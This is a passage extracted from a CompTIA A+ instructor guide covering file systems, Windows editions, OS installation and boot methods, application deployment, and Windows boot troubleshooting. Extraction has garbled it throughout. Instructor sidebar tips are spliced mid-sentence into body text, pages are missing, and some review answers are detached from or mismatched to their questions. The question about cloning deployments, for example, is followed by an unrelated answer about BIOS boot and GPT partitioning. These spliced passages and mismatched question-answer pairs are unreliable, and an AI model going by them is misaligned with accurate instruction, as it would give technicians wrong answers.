however, and cannot logged. In the event of a problem, the sector concerned is marked as bad and
currently be used for the data relocated. Journaling makes recovery after power outages and crashes
the boot volume. faster and more reliable.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 407
• Indexing—The Indexing Service creates a catalog of file and folder locations and
properties, speeding up searches.
FAT32
The FAT file system is a very early type named for its method of organization—the
file allocation table. The FAT provides links from one allocation unit to another.
FAT32 is a variant of FAT that uses a 32-bit allocation table, nominally supporting
volumes up to 2 TB. The maximum file size is 4 GB minus 1 byte.
FAT32 does not support any of the reliability or security features of NTFS. It is
typically used to format the system partition (the one that holds the boot loader).
It is also useful when formatting removable drives and memory cards intended for
multiple operating systems and devices.
exFAT
exFAT is a 64-bit version of FAT designed for use with removable hard drives and
flash media. Like NTFS, exFAT supports large volumes (128 petabytes) and file sizes
(16 exabytes). There is also support for access permissions but not encryption.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
408 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Show
Slide(s) Apple File System
OS Compatibility
Issues
Where Windows uses NTFS and Linux typically uses ext3 or ext4, Apple Mac
workstations and laptops use the proprietary Apple File System (APFS), which
Teaching supports journaling, snapshots, permissions/ownership, and encryption.
Tip
Discuss how
deployment of
OS Compatibility Issues
multiple OS types and
One of the major challenges of supporting a computing environment composed
versions complicates
support procedures in of devices that use different operating systems is compatibility concerns.
terms of supporting Compatibility concerns can be considered in several categories: OS compatibility
users with different with device hardware, software app compatibility with an OS, host-to-host
OS interfaces and compatibility for exchanging data over a network, and user training requirements.
methods, deploying
apps, and making
use of peripheral
Hardware Compatibility and Update Limitations
devices and upgrade
When you plan to install a new version of an operating system as an upgrade or
components (disk
drives, memory, replace one OS with another, you must check that your computer meets the new
adapter cards, and hardware requirements. There is always a chance that some change in a new OS
so on). version will have update limitations that make the CPU and memory technology
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 409
incompatible or cause hardware device drivers written for an older version not
to work properly. For example, Windows 11 requires a CPU or motherboard
with support for trusted platform module (TPM) version 2. This strongly limits its
compatibility with older PCs and laptops.
Running PC Health Check to verify compatibility with Windows 11. This computer’s CPU is not
supported, and it does not have a version 2 TPM. (Screenshot courtesy of Microsoft.)
Software Compatibility
A software application is coded to run on a particular OS. You cannot install an app
written for iOS on an Android smartphone, for instance. The developer must create
a different version of the app. This can be relatively easy for the developer or quite
difficult, depending on the way the app is coded and the target platforms. The app
ecosystem—the range of software available for a particular OS—is a big factor in
determining whether an OS becomes established in the marketplace.
Network Compatibility
Compatibility is also a consideration for how devices running different operating
systems can communicate on data networks. Devices running different operating
systems cannot “talk” to one another directly. The operating systems must support
common network protocols that allow data to be exchanged in a standard format.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
410 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
As extensive testing is very expensive, they are generally reluctant to adopt new
versions without a compelling need to do so.
These compatibility concerns are being mitigated somewhat using web applications
and cloud services. A web application only needs the browser to be compatible, not
the whole OS. The main compatibility issue for a web application is supporting a touch
interface and a very wide range of display resolutions on the different devices that might
connect to it.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 411
Review Activity:
OS Types
3
Teaching
1. Apart from Windows and macOS, what operating system options are
Tip
there for client PCs installed to a local network?
Take some time at
The other main choice is one of the distributions of Linux. A company might also the end of each topic
to answer questions.
use some sort of UNIX. Finally, Chrome OS is installed on Chromebox PCs. These
You can use the
are often used by educational institutions and businesses that rely primarily on web review questions
applications rather than locally installed desktop software. for discussion in
class or set them for
2. You are advising a customer with an older-model Android smartphone. students to complete
The customer wants to update to the latest version of Android, but using individually during or
the update option results in a “No updates available” message. What after class.
type of issue is this, and what advice can you provide?
This is an issue with update limitations. Android is quite a fragmented market, and
customers must depend on the handset vendor to implement OS updates for a
particular model. The customer can only check the handset vendor’s website or
helpline to find out if a version update will ever be supported for that model.
Journaling means that the file system keeps a log of updates that it can use to
recover damaged data. The OS might also make use of snapshot capability to
maintain a file-version history or perform continuous backups.
4. A customer asks whether an iOS app that your company developed will
also work on her Apple macOS computer. What issue does this raise, and
what answer might you give?
The issue here is compatibility between different operating systems. Even though
both are produced by Apple, iOS and macOS use different environments, so the iOS
app cannot necessarily be installed directly. Your company might make a macOS
version. However (do not worry if you did not include this in your answer), with
the latest versions of macOS, there is support for native iOS apps, so this might be
something you can offer.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
412 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 12B
Show
Slide(s)
Compare Windows Editions
Compare Windows
5
Editions
CORE 2 EXAM OBJECTIVES COVERED
Teaching 1.1 Identify basic features of Microsoft Windows editions.
Tip
Having broken
away briefly, this
topic refocuses on Windows 10 and Windows 11 represent the currently supported versions of the
Windows to cover Windows client OS. However, while these versions are used for marketing, they
the differences actually cover a variety of subtly different OSs. For one thing, Windows is released
between editions. We in editions, each distinguished by support for features that target particular market
do have to discuss sectors, such as corporate versus home. Additionally, there have been several
some features that
haven’t been properly iterations of Windows 10, referred to as feature updates. As an A+ technician, you
introduced as subjects must be able to summarize and compare these differences so that you can provide
in their own right proper support and advice to your users.
(such as AD domains
and BitLocker).
Reassure students Windows Versions
that these will be
covered in more detail Windows has been released in several versions over the years. A new version may
later. introduce significant changes in the desktop style and user interface, add new
Show features, and add support for new types of hardware.
Slide(s)
32-bit Versus 64-bit
Windows Versions
Each version and edition of Windows 10 was originally available as 32-bit (x86) or
64-bit (x64) software. A 32-bit CPU can only run the 32-bit editions. A 64-bit CPU
can run either. All 32-bit Windows editions are limited to 4 GB system memory.
64-bit editions all support much more RAM but have different limits for licensing
purposes.
64-bit editions of Windows can run most 32-bit applications software, though there
may be some exceptions (you should check with the software vendor). The reverse
is not true, however; a 32-bit version of Windows cannot run 64-bit applications
software. 64-bit editions of Windows also require 64-bit hardware device drivers
authorized (“signed”) by Microsoft. If the vendor has not produced a 64-bit driver,
the hardware device will not be usable.
Windows 10 with feature update 2004 and later supports 64-bit only. Windows 11 is
64-bit only.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 413
Desktop Styles
The Windows user interface (UI) is based around the desktop, Start menu, taskbar,
and notification area elements. These basic desktop style elements have remained
in place, but Windows versions and feature updates sometimes introduce major
and minor changes. There are frequent changes to the design of the Start menu, for
instance, including its brief expansion into a screen with live app tiles. As another
example, feature update 1607 introduced support for dark themes, and subsequent
updates have tweaked the way dark versus light themes can be configured.
Windows 11 makes several changes to the desktop style. Notably, it center-aligns
the taskbar and introduces yet another design for the Start menu. There is also
better support for multiple desktops. You might use multiple desktops to separate
work documents and apps from games and personal documents.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
414 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• BitLocker enables the user to encrypt all the information on a disk drive.
Encryption means that data on the device is protected even if someone steals it
(as long as they cannot crack the user password). BitLocker is not supported in
Windows Home edition.
Remote Desktop Protocol (RDP) allows a user to connect to the machine and
operate it over a network. While the Home edition has the RDP client software, it
does not support an RDP server.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 415
Use the About settings page to report the edition that is installed. You can usually use a new
product key to change the edition. (Screenshot courtesy of Microsoft.)
• Pro for Workstations and Enterprise editions support 4-way multiprocessing and
up to 256 cores.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
416 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 417
Review Activity:
Windows Editions
6
Teaching
1. In terms of system hardware, what is the main advantage of a 64-bit
Tip
version of Windows?
Take some time at
Support for more than 4 GB RAM. the end of each topic
to answer questions.
2. You are advising a business that needs to provision video-editing You can use the
review questions
workstations with four-way multiprocessing. Which retail Windows
for discussion in
edition will allow them to make full use of this hardware? class or set them for
students to complete
Windows Pro for Workstations supports four-way multiprocessing (four CPUs individually during or
installed to separate sockets) and up to 6 TB RAM. Windows Enterprise has the after class.
same hardware limits but is not available via a retail channel.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
418 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Lesson 12
Summary
4
Show You should be able to explain differences between OS types, versions, and editions
Slide(s) to identify a suitable choice of OS for a given scenario.
Summary
Guidelines for Supporting Operating Systems
Teaching
Tip Follow these guidelines to support use of multiple operating system types in a
Try to include some home or business environment:
time at the end • Establish requirements for workstation (Windows, Linux, macOS, Chrome OS)
of each lesson to
check students’
and cell phone/tablet (iOS, iPadOS, Android) operating systems given devices
understanding and used in the environment.
answer questions.
• Ensure that an appropriate edition is selected when deploying Windows:
• RAM and CPU limits between Home, Pro, Pro for Workstations, and Enterprise
editions.
• Features supported by Pro that are not available in Home (RDP server,
BitLocker, gpedit.msc) and features supported by Enterprise editions that are
not available in Pro.
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 13
Supporting Windows
1
LESSON INTRODUCTION
Supporting an operating system is a greater challenge than simply being able to Show
use the various configuration utilities, management consoles, and commands. To Slide(s)
support an OS, you must be able to plan the deployment of software, train and
Objectives
assist users, and troubleshoot problems. As well as technical challenges, there are
operational and business factors to consider when installing operating systems and Teaching
third-party software. Troubleshooting requires knowledge of common symptoms Tip
and probable causes in addition to being able to use tools to recover a system or This topic completes
data files. This lesson will help prepare you to meet these challenges so that you the block on
can play an effective support role. “standalone” operating
system features and
support procedures by
Lesson Objectives covering installation
and troubleshooting
In this lesson, you will: issues. The lesson
focuses on Windows
• Perform OS installations and upgrades. (notably in the
troubleshooting
• Install and configure applications. section), but try to
emphasize that similar
• Troubleshoot Windows OS problems. support procedures
apply to Linux and
macOS.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
420 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Show
Slide(s)
Perform OS
Topic 13A
Installations and
Upgrades
Perform OS Installations and Upgrades
Teaching
Tip
2
The matching
objective for this topic CORE 2 EXAM OBJECTIVES COVERED
is not OS-specific, but 1.9 Given a scenario, perform OS installations and upgrades in a diverse OS
the content examples environment.
are heavily slanted
toward Windows.
Nonetheless, try to Being able to install or upgrade an operating system can be important if you
include Linux in the have built a custom computer system from scratch, if the system you purchased
presentation where from a vendor did not have the correct system installed, or if you are completely
relevant. redeploying existing hardware from one system to another. The skills and
information in this topic will help you plan and perform an OS installation properly,
Show
for whatever your technical and business requirements might be.
Slide(s)
Installation
and Upgrade Installation and Upgrade Considerations
Considerations
An operating system (OS) installation copies the files from the installation media to
Teaching a partition on the target computer’s fixed disk. Given this basic task, there are a few
Tip installation types that have unique considerations to plan for.
Explain that in-place
upgrades are mostly Clean Install or In-place Upgrade
used by retail
customers where data An attended installation is where the installer inputs the configuration information
is more likely to be in response to prompts from a setup program. There are two main types of
stored on the PC (as attended installation:
opposed to a network
share) and there are • Clean install means installing the OS to a new computer or completely replacing
more likely to be the OS software on an old one by repartitioning and reformatting the target disk.
custom settings/apps Any existing user data or settings are deleted during the setup process.
that would be time-
consuming to reinstall • In-place upgrade means running setup from an existing version of the OS so
and reconfigure.
Remind students that
that third-party applications, user settings, and data files are all kept and made
we have covered in- available in the new version.
place upgrade paths
for Windows already. A clean install is generally seen as more reliable than upgrading. In-place upgrades
are generally designed for home users.
Note that the process
of compatibility
checking is performed Note that you can only upgrade the same type of operating system. You cannot
using automated tools "upgrade" from Windows to Linux, for instance.
(at least for Windows
and macOS). Stress
that making a backup
before performing the
upgrade is critical.
Upgrade Considerations
We’ve already 1. Check hardware compatibility—You must make sure that the CPU, chipset,
discussed the feature and RAM components of the computer are sufficient to run the OS. PC
update delivery model
operating systems now often require a 64-bit CPU, for example. New versions
for Windows 10.
Here, note that it is often have higher RAM requirements than older software.
worth treating these
as upgrades (back 2. Check application and driver support/backward compatibility—Most
up settings and data version upgrades try to maintain support for applications and device drivers
before proceeding). that were developed for older versions. When performing an in-place
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 421
Microsoft maintains a Windows Logo'd Product List (LPL) catalog, previously called the
Hardware Compatibility List (HCL). This is a catalog of tested devices and drivers.
If a device has not passed Windows logo testing, you should check the device vendor's
website to confirm whether there is a driver available.
You can sometimes use automated Upgrade Advisor software to check whether the
existing computer hardware (and software applications) will be compatible with a new
version of Windows. An Upgrade Advisor might be bundled with the setup program or
available from the vendor website.
3. Backup files and user preferences—For a clean install, you can use a backup
to restore data and settings after OS setup has been completed. For an in-
place upgrade, a security backup is essential in case the upgrade goes wrong
and you need to recover data.
Feature Updates
The Windows 10 and Windows 11 product lifecycles make use of feature updates
to introduce changes to the desktop environment and bundled apps. These
are delivered via Windows Update. While they rarely have different hardware
requirements, it is best to treat a feature update in the same way as you would an
in-place upgrade. Check for any hardware or software compatibility concerns and
make a backup before proceeding.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
422 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The Windows System Image Manager is used to configure answer files. An answer file contains the
information input during setup, such as product key, disk partitions, computer name, language
and network settings (including whether to join a domain or workgroup), and so on.
(Screenshot courtesy of Microsoft.)
Boot Methods
Show The installation boot method refers to the way in which the setup program, answer
Slide(s) file (if used), and OS files or system image are loaded onto the target PC. You may
need to access the computer’s firmware setup program to ensure that a particular
Boot Methods
boot method is available, enabled, and set to the highest priority.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 423
Teaching
Tip
The choices for a clean
install are bootable
external disk (typically
connected by USB),
optical drive, internal
partition (typically
for a recovery-type
install), and network.
Remind students that
the appropriate boot
priority needs to be
set via system setup
(covered in the Core 1
course).
Explain the
components required
to perform a network
boot: PXE-compatible
network adapter and
a DHCP server to point
the client to a remote
installation server.
Configuring boot devices and priority in a computer’s firmware setup program. Explain that
“Internet-based” is
not a mainstream
Optical Media setup boot method
at the time of
Historically, most attended installations and upgrades were run by booting from writing. However,
optical media (CD-ROM or DVD). The optical drive must be set as the priority boot most installers will
device. use an available
Internet connection
to download the
USB and External Drives and Flash Drives latest files or the
entire OS image (if
Fewer computers have optical drives these days. Another problem with disc-based
using a minimal setup
installs is that the setup disc quickly becomes out-of-date and post-installation tasks program). This is also
for installing drivers, updates, and service packs can take longer than the original typically the method
installation. One way around this is to build slipstreamed media, with all the various used for in-place
patches and drivers already applied. The media could be CD-ROM, DVD, or USB- upgrades where
attached flash drive or external drive connected by USB. the setup process is
launched from within
When using an external/hot-swappable hard drive or solid-state flash drive as boot the existing OS. You
media, the boot method should be set to use the USB-connected device as the might also want to
mention orchestration
priority option.
and automation
technologies for
Microsoft provides a Media Creation Tool to create installation media from the product deploying VMs in the
setup files. The tool can either make a bootable USB thumb drive or generate an ISO file cloud.
that can be written to a physical DVD.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
424 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Network Boot
Network boot setup means connecting to a shared folder containing the
installation files, which could be slipstreamed or use image deployment. The target
PC must have a usable partition on the hard disk in which to store temporary files.
There also needs to be some means of booting without having a suitably formatted
local drive present. Most computers now come with a Preboot eXecution
Environment (PXE)–compliant firmware and network adapter to support this boot
option. The client uses information provided via a Dynamic Host Configuration
Protocol (DHCP) server to locate a suitably configured server that holds the
installation files or images and starts the setup process.
Internet-Based Boot
A computer that supports network boot could also be configured to boot to setup
over the Internet. In this scenario, the local network’s DHCP server must be
configured to supply the DNS name of the installation server.
More commonly, most setup installers need to connect to the Internet to download
updates and optional packages.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 425
If four drives are insufficient and GPT is not an option, one partition can be configured
as extended and divided into as many logical drives as needed. Extended partitions do
not have boot sectors and cannot be made active.
The start of each primary partition contains a boot sector, or partition boot record
(PBR). When a partition is marked as active, its boot sector is populated with a record
that points to the OS boot loader. In Windows, this active partition is also referred
to as the system partition or system reserved. The drive containing the Windows
operating system files is referred to as the boot partition. This can be on a logical
drive in an extended partition and does not have to be the same as the system drive.
When the disk uses MBR partitioning, the system firmware must be set to use the
legacy BIOS boot method. If the boot method is set to UEFI, the disk will not be
recognized as a boot device.
GPT-Style Partitioning
The globally unique identifier (GUID) partition table (GPT) style provides a more
up-to-date scheme to address some of the limitations of MBR. One of the features
of GPT is support for more than four primary partitions. Windows allows up to 128
partitions with GPT. GPT also supports larger partitions (2 TB+) and a backup copy
of the partition entries. A GPT-style disk includes a protective MBR for compatibility
with systems that do not recognize GPT.
When the disk uses GPT partitioning, the system firmware must be set to use the
UEFI boot method. If the boot method is set to BIOS, the disk will not be recognized
as a boot device.
Drive Format
An OS must be installed to a partition formatted using a compatible file system. For
Windows, this means using NTFS. macOS uses APFS and Linux can use ext3/ext4 or
a variety of other file system types. During an attended installation, partition and
formatting choices are guided by the setup program.
Default choices made by the guided setup program for Ubuntu Linux. Partition 1 holds the EFI
System Partition (ESP) bootloader. The other partition holds the root file system and is formatted
using ext4.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
426 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Repair Installation
Show If a computer will not boot or if you are troubleshooting a problem such as slow
Slide(s) performance and cannot find a single cause, it may be necessary to perform some
Repair Installation sort of repair installation.
Reset Windows
Windows supports refresh and reset options to try to repair the installation. Using
refresh recopies the system files and reverts most system settings to the default
but can preserve user personalization settings, data files, and apps installed via
Windows Store. Desktop applications are removed.
Using the full reset option deletes the existing OS plus apps, settings, and data
ready for the OS to be reinstalled.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 427
Review Activity:
OS Installations and Upgrades
3
1. You are supporting a home user with upgrading a computer from Teaching
Windows 10 to Windows 11. You have run Microsoft’s PC Health Tip
Check tool, and it verifies that the computer meets the hardware Take some time at
requirements. Should you now proceed with the in-place upgrade? the end of each topic
to answer questions.
No. You must backup user data and settings first. A backup is essential as a security You can use the
review questions
precaution. for discussion in
class or set them for
2. You are writing some work instructions to assist technicians with students to complete
deploying new user desktops via cloning. What type of installation and individually during or
boot method is this process most likely to use, and what are the boot after class.
requirements?
The PC is set to boot using the legacy BIOS method. This is not compatible with
GPT-style partitioning. If supported by system firmware setup, switch to UEFI boot.
If the firmware is BIOS only, change the boot method back to optical disc, run setup
again, and choose MBR partitioning.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
428 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Show
Slide(s)
Topic 13B
Install and Configure
Applications Install and Configure Applications
4
Teaching
Tip
CORE 2 EXAM OBJECTIVES COVERED
Again, this objective is 1.7 Given a scenario, apply application installation and configuration concepts.
not Windows-specific.
Aim the discussion
toward general
requirements rather An operating system on its own does not allow users to do useful work. Computers
than the specific
are productive devices because they run different kinds of software applications.
installer/package
manager tools. Do Installing and configuring third-party applications is a crucial part of the IT support
remind students of the role. In this topic, you will learn the tools and features used to follow best practices
distinction between for software management.
store-based apps
and independently
installed software. System Requirements for Applications
Show System requirements for applications refers to the PC specification required
Slide(s) to run third-party software. The app vendor should publish the requirements as
System Requirements support information.
for Applications
Central Processing Unit, System Memory, and Storage
Teaching Requirements
Tip
Explain that system Central Processing Unit (CPU) requirements refers to the performance and
requirements refers features of the computer’s main processor. Like operating systems, software
to the PC’s hardware applications can be developed as 32-bit or 64-bit software. Some apps may have
spec. Note that a both 32-bit and 64-bit versions. A 64-bit application requires a 64-bit CPU and OS
64-bit application
platform. It cannot be installed on a 32-bit platform. 32-bit software applications
cannot be installed to
a hardware platform can usually be installed on 64-bit platforms, however.
with 32-bit-only Some applications will define minimum requirements for the CPU generation,
support (conversely
a 64-bit platform can
clock speed, or number of cores. An application may also require a particular CPU
usually run 32-bit feature, such as hardware-assisted virtualization or a trusted platform module
software). (TPM).
If a required feature is not detected, check the system setup program to make sure it
hasn’t just been disabled.
There may also be a specific RAM requirement. This will generally assume that no
other foreground software will run at the same time. Running multiple programs
simultaneously will require more RAM.
Storage requirements refers to the amount of installation space the software will
take up on the fixed disk. Of course, you must also provision space for additional
file creation, such as user-generated data, temporary files, and log files.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 429
This computer’s graphics adapter does not meet the minimum specification, so setup cannot
proceed. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
430 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Distribution Methods
Show An app distribution method is the means by which the vendor makes it available
Slide(s) to install. Many apps are published through app stores, in which case the
Distribution Methods
installation mechanics are handled automatically.
Desktop applications are installed from a setup file. In Windows, these use either
.EXE or .MSI extensions. Apps for macOS can use DMG or PKG formats. Linux
packages use DEB packages with the APT package manager or RPM for YUM.
The setup file packs the application’s executable(s), configuration files, and media
files within it. During setup, the files are extracted and copied to a directory
reserved for use for application installation.
This type of setup file can be distributed on physical media, such as CD/DVD or a
USB thumb drive, or it could be downloaded from the Internet. When downloading
an installer from an Internet location, it is imperative to verify the authenticity and
integrity of the package and to scan it for malware. Windows uses a system of
digital signatures to identify valid developers and software sources. Linux software
is verified by publishing a hash value of the package. After download, you should
generate your own hash of the package and compare it to the value published by
the package maintainer.
Unknown publisher UAC notification. Unless you have other means of confirming that the installer
is a legitimate package, it is not safe to proceed with setup. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 431
As an alternative to physical media, an ISO file contains the contents of an optical disc
in a single file. ISO files stored on removable media or a host system are often used
to install virtual machine operating systems. A mountable ISO is often used to install
complex apps, such as databases, where there are many separate components and
large file sizes to install. In Windows, right-click an ISO file and select Mount. The ISO
file will appear in File Explorer with the next available drive letter.
Other Considerations
To maintain a secure and robust computing environment, potential impacts Show
from deploying new applications must be assessed and mitigated. It is important Slide(s)
that the IT department maintains control and oversight of all third-party software Other Considerations
installed to network hosts. Unsanctioned software and devices—shadow IT—raises
substantial operational and business risks. Teaching
Tip
Impact to Business Explain that
regardless of system
In a corporate environment, any application that is installed must also be requirements, a new
supported. application might have
adverse effects on
• Licensing—Commercial software must be used within the constraints of its
other apps and on the
license. This is likely to restrict either the number of devices on which the network.
software can be installed or the number of users that can access it. Installing
Discuss how apps can
unlicensed software exposes a company to financial and legal penalties. consume additional IT
support requirements,
• Support—Software might be available with paid-for support to obtain updates, such as training and
monitor and fix security issues, and provide technical assistance. Alternatively, user-support cases,
security monitoring and user assistance could be performed by internal staff, and how software
but the impact to IT operations still needs assessing. in an enterprise
environment must
• Training—Complex apps can have a substantial and expensive user-training be authorized and
requirement. This can be an ongoing cost as new versions can introduce monitored to prevent
risks from shadow IT.
interface or feature changes that require more training or new employees
require initial training. If the app is supported internally, there might also be
a technical training requirement to ensure that staff can provide support and
maintain the application in a secure state.
Impact to Operation
As well as the broader business impacts, a project to deploy a new application must
also consider impacts to operation. Where there are hundreds of desktops, the IT
department will need to use automated tools to deploy, update, and support the app.
When an organization wants to deploy an application to a number of desktops, it
is likely to use a network-based installer. In this scenario, the setup file is simply
copied to a shared folder on the network, and client computers run the setup file
from the network folder. In Windows, you can use policies—Group Policy Objects
(GPOs)—to set a computer to remotely install an application from a network folder
without any manual intervention from an administrator. Products such as centrally
managed antivirus suites often support “push” deployment tools to remotely install
the client or security sensor on each desktop.
One advantage of using a tool such as GPO to deploy applications is that a user
does not have to log on to the local client with administrator privileges. Writing/
modifying permissions over folders to which the application-executable files are
installed are restricted to administrator-level accounts. This prevents unauthorized
modification of the computer or the installation of programs that could threaten
security policies. The setup file for a deployed application can run using a service
account.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
432 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 433
Review Activity:
Applications
5
1. You are writing work instructions for third-party app deployments Teaching
using the CompTIA A+ objectives to guide you. In the section on system Tip
requirements for applications, you have covered the following topics: Take some time at
the end of each topic
• 32-bit- vs. 64-bit-dependent application requirements to answer questions.
You can use the
• Dedicated graphics card vs. integrated (VRAM requirements) review questions
for discussion in
• RAM requirements class or set them for
students to complete
• CPU requirements individually during or
after class.
• External hardware tokensWhat additional topic should you include,
if any?
Storage requirements. Each app takes up a certain amount of space when installed
to the fixed disk. Also, you must plan for user-generated file storage, temp files, log
files, and other data generated through use of the app.
2. You have downloaded an installer for a third-party app from the vendor’s
website. What should you do before proceeding with setup?
Verify the integrity of the download using a hash value or the vendor’s digital
certificate.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
434 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 13C
Show
Slide(s) Troubleshoot Windows OS Problems
Troubleshoot 4
Windows OS Problems
If there is more than one OS installation, the boot manager shows a boot menu,
allowing the user to select the installation to boot.
WINLOAD then continues the Windows boot process by loading the kernel
(NTOSKRNL.EXE), the hardware abstraction layer (HAL.DLL), and boot device
drivers. Control is then passed to the kernel, which initializes and starts loading the
required processes. When complete, the WINLOGON process waits for the user to
authenticate.
With an EFI boot, the initial part of the boot process is different. Following POST, the
firmware reads the GUID partition table (GPT) on the boot device.
The GPT identifies the EFI System Partition. The EFI system partition contains the EFI
boot manager and the BCD. Each Windows installation has a subfolder under \EFI\
Microsoft\ that contains a BCD and BOOTMGFW.EFI.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 435
BOOTMGFW.EFI reads the BCD to identify whether to show a boot menu and to find
the location of WINLOAD.EFI. From this point, the Windows boot loader continues
the boot process by loading the kernel, as described previously.
Within startup options, from the first Choose an option screen, select
Troubleshoot. From the next screen, select Advanced options. Select Startup
Settings, and then on the next screen, select Restart.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
436 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Press F4 to select Safe Mode, or choose another option as necessary. Safe Mode
loads only basic drivers and services required to start the system. This is a useful
troubleshooting mode as it isolates reliability or performance problems to add-in
drivers or application services and rules out having to fully reinstall Windows. It may
also be a means of running analysis and recovery tools, such as chkdsk, System
Restore, or antivirus utilities.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 437
System Restore
System Restore allows you to roll back from system configuration changes. System Show
Restore allows for multiple restore points to be maintained (some are created Slide(s)
automatically) and to roll back from changes to the whole registry and reverse System Restore
program installations and updates.
System Restore does not restore (or delete) user data files.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
438 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Using System Restore to apply a previous system configuration. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 439
System Restore does not usually reset passwords (that is, passwords will remain as they
were before you ran the restore tool), but System Restore does reset passwords to what
they were at the time the restore point was created if you run it from the product disk.
If you are experiencing problems with a device and you have recently updated
the driver, Windows also provides a Roll Back Driver feature. A new driver may
not work properly because it has not been fully tested, or it may not work on your
particular system. You can use Device Manager to revert to the previous driver.
Right-click the device and select Properties. Select the Driver tab, and then select
the Roll Back Driver button.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
